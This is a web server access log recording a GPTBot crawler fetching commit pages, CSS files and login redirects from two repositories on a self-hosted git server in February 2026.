"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" +[17/Feb/2026:19:54:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" +[17/Feb/2026:19:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" +[17/Feb/2026:19:54:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" +[17/Feb/2026:19:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10030] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 74.7.227.38] [Length 10129] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" +[17/Feb/2026:19:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20083] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" +[17/Feb/2026:19:54:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:19:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css/style.css" [Client 74.7.227.38] [Length 13119] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/css" +[17/Feb/2026:19:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:19:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 74.7.227.38] [Length 12661] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" +[17/Feb/2026:19:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:19:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:19:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fcss" [Client 74.7.227.38] [Length 23879] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fcss" [Client 74.7.227.38] [Length 25036] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 74.7.227.38] [Length 10111] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" +[17/Feb/2026:19:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:19:54:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 74.7.227.38] [Length 10074] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" +[17/Feb/2026:19:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:19:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 74.7.227.38] [Length 12663] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" +[17/Feb/2026:19:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 74.7.227.38] [Length 10098] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" +[17/Feb/2026:19:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css/style.css" [Client 74.7.227.38] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:19:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css/style.css" [Client 74.7.227.38] [Length 14686] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/css" +[17/Feb/2026:19:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/css/style.css" [Client 74.7.227.38] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:19:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:19:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 74.7.227.38] [Length 13118] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css" +[17/Feb/2026:19:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10111] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" +[17/Feb/2026:19:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10106] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" +[17/Feb/2026:19:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" +[17/Feb/2026:19:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 74.7.227.38] [Length 12659] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" +[17/Feb/2026:19:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10108] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" +[17/Feb/2026:19:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 74.7.227.38] [Length 10087] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" +[17/Feb/2026:19:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31828] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10103] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" +[17/Feb/2026:19:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10140] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" +[17/Feb/2026:19:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10141] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" +[17/Feb/2026:19:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" +[17/Feb/2026:19:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" +[17/Feb/2026:19:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" +[17/Feb/2026:19:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10106] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" +[17/Feb/2026:19:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10102] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" +[17/Feb/2026:19:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" +[17/Feb/2026:19:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13338] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/css" +[17/Feb/2026:19:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31547] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 31597] [Gzip 9.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20082] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 